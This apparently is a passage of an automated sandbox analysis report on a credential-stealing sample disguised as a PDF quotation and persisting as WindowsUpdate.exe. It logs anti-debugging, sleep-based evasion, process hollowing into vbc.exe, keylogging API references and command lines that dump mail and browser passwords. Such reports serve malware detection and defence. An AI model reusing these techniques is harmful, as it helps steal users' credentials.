              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,3_2_00408836
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeThread delayed: delay time: 1500000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 5924Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 6072Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 6004Thread sleep time: -140000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 1380Thread sleep time: -1500000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 6840Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 5780Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6360Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00404A29 FindFirstFileExW,0_2_00404A29
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B018BD FindFirstFileExA,0_2_00B018BD
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B01BA6 FindFirstFileExW,FindClose,FindNextFileW,0_2_00B01BA6
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,2_2_00406EC3
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,3_2_00408441
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,3_2_00407E0E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00404A29 FindFirstFileExW,8_2_00404A29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F018BD FindFirstFileExA,8_2_00F018BD
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW,8_2_00F01BA6
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F01D5C FindFirstFileExW,8_2_00F01D5C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F01D31 FindFirstFileExA,8_2_00F01D31
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00404A29 FindFirstFileExW,11_2_00404A29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F018BD FindFirstFileExA,11_2_00F018BD
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW,11_2_00F01BA6
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01D5C FindFirstFileExW,11_2_00F01D5C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01D31 FindFirstFileExA,11_2_00F01D31
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004161B0 memset,GetSystemInfo,3_2_004161B0
              Source: WindowsUpdate.exe, 0000000B.00000003.301585581.000000000166C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.301923048.0000000001677000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZZ|
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040446F
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,3_2_00408836
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,2_2_00404837
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_004035F1 mov eax, dword ptr fs:[00000030h]0_2_004035F1
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B17B00 mov eax, dword ptr fs:[00000030h]0_2_00B17B00
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD90B9 mov eax, dword ptr fs:[00000030h]0_2_00AD90B9
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD9077 mov eax, dword ptr fs:[00000030h]0_2_00AD9077
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF6492 mov eax, dword ptr fs:[00000030h]0_2_00AF6492
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF64EE mov eax, dword ptr fs:[00000030h]0_2_00AF64EE
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF640A mov eax, dword ptr fs:[00000030h]0_2_00AF640A
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF644E mov eax, dword ptr fs:[00000030h]0_2_00AF644E
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF65A5 mov eax, dword ptr fs:[00000030h]0_2_00AF65A5
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF65EA mov eax, dword ptr fs:[00000030h]0_2_00AF65EA
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF662F mov eax, dword ptr fs:[00000030h]0_2_00AF662F
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF6662 mov eax, dword ptr fs:[00000030h]0_2_00AF6662
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_004035F1 mov eax, dword ptr fs:[00000030h]8_2_004035F1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F17B00 mov eax, dword ptr fs:[00000030h]8_2_00F17B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED90B9 mov eax, dword ptr fs:[00000030h]8_2_00ED90B9
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED9077 mov eax, dword ptr fs:[00000030h]8_2_00ED9077
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF64EE mov eax, dword ptr fs:[00000030h]8_2_00EF64EE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF6492 mov eax, dword ptr fs:[00000030h]8_2_00EF6492
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF644E mov eax, dword ptr fs:[00000030h]8_2_00EF644E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF640A mov eax, dword ptr fs:[00000030h]8_2_00EF640A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF65EA mov eax, dword ptr fs:[00000030h]8_2_00EF65EA
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF65A5 mov eax, dword ptr fs:[00000030h]8_2_00EF65A5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF6662 mov eax, dword ptr fs:[00000030h]8_2_00EF6662
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF662F mov eax, dword ptr fs:[00000030h]8_2_00EF662F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_004035F1 mov eax, dword ptr fs:[00000030h]11_2_004035F1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F17B00 mov eax, dword ptr fs:[00000030h]11_2_00F17B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED90B9 mov eax, dword ptr fs:[00000030h]11_2_00ED90B9
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED9077 mov eax, dword ptr fs:[00000030h]11_2_00ED9077
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF64EE mov eax, dword ptr fs:[00000030h]11_2_00EF64EE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF6492 mov eax, dword ptr fs:[00000030h]11_2_00EF6492
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF644E mov eax, dword ptr fs:[00000030h]11_2_00EF644E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF640A mov eax, dword ptr fs:[00000030h]11_2_00EF640A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF65EA mov eax, dword ptr fs:[00000030h]11_2_00EF65EA
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF65A5 mov eax, dword ptr fs:[00000030h]11_2_00EF65A5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF6662 mov eax, dword ptr fs:[00000030h]11_2_00EF6662
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF662F mov eax, dword ptr fs:[00000030h]11_2_00EF662F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F17F90 mov eax, dword ptr fs:[00000030h]11_2_00F17F90
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_004067FE GetProcessHeap,0_2_004067FE
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401E1D SetUnhandledExceptionFilter,0_2_00401E1D
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040446F
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00401C88
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401F30
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD1AF5 SetUnhandledExceptionFilter,0_2_00AD1AF5
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF66D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AF66D3
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD1963 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD1963
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00401E1D SetUnhandledExceptionFilter,8_2_00401E1D
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0040446F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00401C88
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401F30
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED1AF5 SetUnhandledExceptionFilter,8_2_00ED1AF5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF66D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EF66D3
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED1963 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00ED1963
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED1DDE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00ED1DDE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00401E1D SetUnhandledExceptionFilter,11_2_00401E1D
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0040446F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00401C88
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00401F30
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED1AF5 SetUnhandledExceptionFilter,11_2_00ED1AF5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF66D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00EF66D3
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED1963 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00ED1963
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED1DDE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00ED1DDE
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              .NET source code references suspicious native API functionsShow sources
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
              Allocates memory in foreign processesShow sources
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_0040208D cpuid 0_2_0040208D
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B06054
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00AF8376
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00AF84D1
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00AF8450
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00B056EB
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00B059D7
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00B0596E
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00B05A72
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00F06054
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00EF8376
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00EF84D1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00F056EB
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00F059D7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00F0596E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00F05A72
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00F05B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,8_2_00F05D50
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00F05E79
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,8_2_00F05F81
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,8_2_00EF8F37
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00F06054
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00EF8376
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00EF84D1
